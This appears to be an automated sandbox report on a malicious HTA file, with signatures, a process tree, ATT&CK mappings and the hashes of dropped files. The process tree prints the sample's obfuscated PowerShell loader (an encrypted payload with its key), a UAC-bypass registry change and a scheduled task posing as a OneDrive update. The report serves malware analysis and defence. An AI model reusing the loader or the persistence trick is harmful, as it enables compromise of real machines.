Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
13/02/2024, 05:16
Static task
static1
Behavioral task
behavioral1
Sample
caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta
Resource
win7-20231215-en
General
-
Target
caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta
-
Size
76KB
-
MD5
7e08e28d64e2026b8325935172c27c6b
-
SHA1
3be2858857ffba56416db3001a4f9a382a7404ec
-
SHA256
caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7
-
SHA512
816dd4906b26ac9fdaed836ca273588cac0d807868934715d500c3a9f8ad31bd11020d3a589d016a1c60c93fe714602f45963e78932b36ae1fa4cc54048190e9
-
SSDEEP
768:H0nzwRQmH5omBvaGGZFD9lu2drSX0kUG39UaZd4xJk0sS7:AzwGmHfBsZFDfu2dmX0kUmU/uS7
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 16 3748 powershell.exe 19 3748 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 1100 tiago.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2592 schtasks.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 3128 powershell.exe 3128 powershell.exe 3748 powershell.exe 3748 powershell.exe 4604 powershell.exe 4604 powershell.exe 1100 tiago.exe 1100 tiago.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3128 powershell.exe Token: SeDebugPrivilege 3748 powershell.exe Token: SeDebugPrivilege 4604 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4576 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe 4576 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4692 wrote to memory of 3128 4692 mshta.exe 83 PID 4692 wrote to memory of 3128 4692 mshta.exe 83 PID 4692 wrote to memory of 3128 4692 mshta.exe 83 PID 3128 wrote to memory of 3748 3128 powershell.exe 85 PID 3128 wrote to memory of 3748 3128 powershell.exe 85 PID 3128 wrote to memory of 3748 3128 powershell.exe 85 PID 3748 wrote to memory of 4576 3748 powershell.exe 90 PID 3748 wrote to memory of 4576 3748 powershell.exe 90 PID 3748 wrote to memory of 4576 3748 powershell.exe 90 PID 3748 wrote to memory of 4604 3748 powershell.exe 91 PID 3748 wrote to memory of 4604 3748 powershell.exe 91 PID 3748 wrote to memory of 4604 3748 powershell.exe 91 PID 4604 wrote to memory of 2592 4604 powershell.exe 93 PID 4604 wrote to memory of 2592 4604 powershell.exe 93 PID 4604 wrote to memory of 2592 4604 powershell.exe 93 PID 4576 wrote to memory of 4040 4576 AcroRd32.exe 95 PID 4576 wrote to memory of 4040 4576 AcroRd32.exe 95 PID 4576 wrote to memory of 4040 4576 AcroRd32.exe 95 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2696 4040 RdrCEF.exe 96 PID 4040 wrote to memory of 2660 4040 RdrCEF.exe 97 PID 4040 wrote to memory of 2660 4040 RdrCEF.exe 97 PID 4040 wrote to memory of 2660 4040 RdrCEF.exe 97 PID 4040 wrote to memory of 2660 4040 RdrCEF.exe 97 PID 4040 wrote to memory of 2660 4040 RdrCEF.exe 97
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $SNTyz = 'AAAAAAAAAAAAAAAAAAAAALmk2b6lObDopuf9qJWqGCtzC7CpptCgBnt5rHGdK0CvSJKhFnvqJYIoDdgjV85+2qtRocrUk9BcXKKoE9JsNJgtMBltspO1u78Mfl7YMlQ0P6ZscPVex7HSoCRP10vd0aIFQ1RIYahKuYd6bdmAphNVCCPHUBzYTI7VBNdM83D7XZFoec+s23GTfZWtuLYtYiS/OTUEzlhOwnMxN3sP2n8EbAo9BGzEBkxFbuCbhHyPb0i1m4H+rOtXNkftKSWiPM4ZXhtfLWDXCtqRIJhHmHUZErlqLgiNahl0E0q5FgZZm7OPmMEoMyuXzOzt1+cRrN1Ctv6HcMAYuAhBzws+/DaLNhYS+WE4CDQVfS8Ok13+MLPrzW7O9DoG3TCRFMLBTGp+78w993AYJtFm12crbdAyk79fGa6dn8PRunfMPiXcbyo2OkAJQE/5Sd5Qu6Wk7Dmxy98RYGde8kwD9ip5r7gf6c1124Am/BEazQnaTet4zRGw963Te9Jey/4OUUf7n/wQFzO68GOZebttJyOyf7t0YP+Phce1GZBsIMJ8r/OAa1QCgIBQ3bvh+Wb7pC4r1Bu+UgwFMnLY+oWJUr3sUMzcwoEDJylcmUbX1Usq77b1fKmB201lgyr0PKGLEt3IORnPBhTD81gOlFbkTg2IfcheTlv3Xu9kzvd3D0LOjJ6UHpKh1u7DWwC4qflR5AUIjGX81KrOdsIj4I8cSzvTEUbFoOe/Merccz3NEtk5Aq1z0o9g5fFuBaXQvrhGFkyOkdNFzRiCJEGtBWCt4ssADBmv0Mp4PLNrPGKQ+GKQNdRRdnRYWVcdDlQjvqRQoSBqMbb0RVi1bkQLcO0ZooLIzLbzcmwfgDvTyVCk2p/3p5mAhvJIGg+WcG7kH76z2nvrBGoVqQUzcEx6MvAzDXDb/VDkrzZz5DN6h42PvwxThFmO926dcbjgZUumX1jUcIsr+Cm4IQxjQnyZAscmjTeJ4WKfIU3zpS5dKT2LTLVjDxVUzzqlTmd/rBgzYJcQl1dlkMzxPLgnpQq/Pwf3+iGIYoW6TLrCGfenlPxiURCdq0ejJLKErJg0tIF+CxtB+v3FETsTyH0UkR5J3TwQjZHsgGZFNQLNnkBTwpdQAOsdW+LTRyRcION9/NP5yk3ZQHcSQeiNfbC4vS8iCRrjSR31swF/MC7PANy+yO7STigHV+6S5OCbKezZXAWlClJUP+G0Zg==';$NYvzm = 'dE92WmpUelNoc1NyUHdadGdKY1lsaHNuQWxvanpYdVg=';$JxlzVEaB = New-Object 'System.Security.Cryptography.AesManaged';$JxlzVEaB.Mode = [System.Security.Cryptography.CipherMode]::ECB;$JxlzVEaB.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$JxlzVEaB.BlockSize = 128;$JxlzVEaB.KeySize = 256;$JxlzVEaB.Key = [System.Convert]::FromBase64String($NYvzm);$CcxpA = [System.Convert]::FromBase64String($SNTyz);$cnnQFgZm = $CcxpA[0..15];$JxlzVEaB.IV = $cnnQFgZm;$LEiiXZOgN = $JxlzVEaB.CreateDecryptor();$AcOIkQZxG = $LEiiXZOgN.TransformFinalBlock($CcxpA, 16, $CcxpA.Length - 16);$JxlzVEaB.Dispose();$BMBI = New-Object System.IO.MemoryStream( , $AcOIkQZxG );$mZNCUMQO = New-Object System.IO.MemoryStream;$NPwQahcaV = New-Object System.IO.Compression.GzipStream $BMBI, ([IO.Compression.CompressionMode]::Decompress);$NPwQahcaV.CopyTo( $mZNCUMQO );$NPwQahcaV.Close();$BMBI.Close();[byte[]] $kiEmVbL = $mZNCUMQO.ToArray();$tsWNTzTK = [System.Text.Encoding]::UTF8.GetString($kiEmVbL);$tsWNTzTK | powershell -2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -3⤵
- UAC bypass
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9545581D79F35B4FBD36142FD2BA4175 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:2696
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DC11A45097DBFBFF3AF730C4F9BB5B13 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DC11A45097DBFBFF3AF730C4F9BB5B13 --renderer-client-id=2 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job /prefetch:16⤵PID:2660
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2B5AA1338AA8D91A52D5EF573D2AAD4D --mojo-platform-channel-handle=2324 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:3204
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=65066A0E9527A0BBE78C8DAFEA8937AF --mojo-platform-channel-handle=1860 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:4012
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=51EEEC5815E9D06CF315E4B910DA83A6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=51EEEC5815E9D06CF315E4B910DA83A6 --renderer-client-id=6 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job /prefetch:16⤵PID:2396
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=013189DA1070CDA672C891D40C8C490A --mojo-platform-channel-handle=2732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:2960
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks.exe /TN 'MicrosoftOneDriveUpdateTaskMachine' /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /TN MicrosoftOneDriveUpdateTaskMachine /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON5⤵
- Creates scheduled task(s)
PID:2592
-
-
-
C:\Users\Admin\AppData\Roaming\tiago.exe"C:\Users\Admin\AppData\Roaming\tiago.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1100
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3112
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD5de3cebc82d53fb6d17884a1aea56b1e0
SHA11de17e9646d771be3b2d52680141e407fd57e588
SHA2565ab42728ffcbd778a572eaed4551635b673157b2dad29999e48e3ce81e894550
SHA51286b82b01122154f5c194f417b6cbaf6027381741674eb49d0ddc243aa29d0349ac7856ebe6022d6f36110001ad7c264d60f6fdb6ad7c0dbbda27e22f906b5d8d
-
Filesize
1KB
MD528854213fdaa59751b2b4cfe772289cc
SHA1fa7058052780f4b856dc2d56b88163ed55deb6ab
SHA2567c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915
SHA5121e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4
-
Filesize
17KB
MD519cb1e21041b92dee9eabfcc4c38002d
SHA10a6c15fb65709dbb077edef4012456e60ae9b439
SHA256a377bbbe35eb06a8b63fc0f5cffc6f573403672de4e9302c58dc3285484059ae
SHA51212c8f6f83e06ccb19970b8e3fd5b03ac4caaa378adf8eded4d62d5178acc5d8016dc8343e93eafe2b7c2d6c293577d50b61814a2794a0091c0e169c653b93792
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize6KB
MD5475dbfef62d8d7f81b4dd2b53d171874
SHA182db91018360bff63bdb7d48b772807a9e819b33
SHA256fa94674ffac5fc9ad091b3f84ead4c9d700aa1dd3f605baafde1d737038010ad
SHA512413b608ecd17240bf825c64d9ce136ca5dbc3670869b4b30d9ec1e6b7cbd5063937f57265ec17dad44bb309f48ff4086857cf5532971b6c5f5e8ae4b9bd2db22
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize6KB
MD53ee907851972b85fa6c89213ab2ff59a
SHA11a37d88c8ed2725c83b51a7a13c03975347edff3
SHA256cb831c150881c73596b2dbd17c62aedfab9560a46d1b98b6203693064130af13
SHA5122426d511f9567560b84bc69703e8603bb0e81de53ea3482dfb469269c437b25ac6bea3125ed86e4a7cb0205bf02202908f21595b02930bd5e0f93073a886bf3f
-
Filesize
18KB
MD5da49bbe37855af62a6a8809453d17b83
SHA11f59e84376b2acda296b1b431a16e5cd5dfb7da8
SHA256229defbb0cee6f02673a5cde290d0673e75a0dc31cec43989c8ab2a4eca7e1bb
SHA5124aa87ac380cc78375170b08767edac27929fdacceeec84f555dd249239722064388803e675e0ec95c06487cd2c158b83cd768f08d61ee57515e5c52f191f7cd0
-
Filesize
3.1MB
MD5422685ab15e451d6f7711158024fa4f6
SHA1e45448109926784b6467cb48998e6c8e32495fc9
SHA256d8f3ed609b72d51bec14f86f93cca5f74769c55ce287161faadf800b97f29b43
SHA512f11bce9c7af9a4114320ad05f2391c36a616e20e5c7d07fac25ed7349ef533ac698933495a69576e5fe2457d7db35c3b1ad59fe7c63f4d1105e185a16364ebce
-
Filesize
1.8MB
MD531415dcf7570fbfab1dc5668ca881af3
SHA1208c063040a2bbc9ace3b6545a6d828325dd421d
SHA256f35575ed9ef1430dd27a89ad0a1fe8420135fc5f93530ae9ddf5bc0fb16168be
SHA51253fafdbdc306aa2d6be170cc0217f8345a80540a4d6d7d3593d630605dc6072a8d29aa28ca35d55f914a6354d5b951e9182f859b7f282e2395efa75b1374a533
-
Filesize
971KB
MD59ed14734172b3aea61e7bb4972fe5d5c
SHA1bf332f447b760f5a3b7075e79f3e3860df334ff1
SHA256f6b74b21f1bc0cecf6ece4bc5a58c068be8746974924cd256255cffcfcc81c81
SHA512bc219bb954bc75465c7c4bbd496677265a925fa30b3fcf250e2ba1fa7f20543a75e2bddc411e81fbcf656f8ef960dccdaac1de305500024c235fb3600dbf4f0b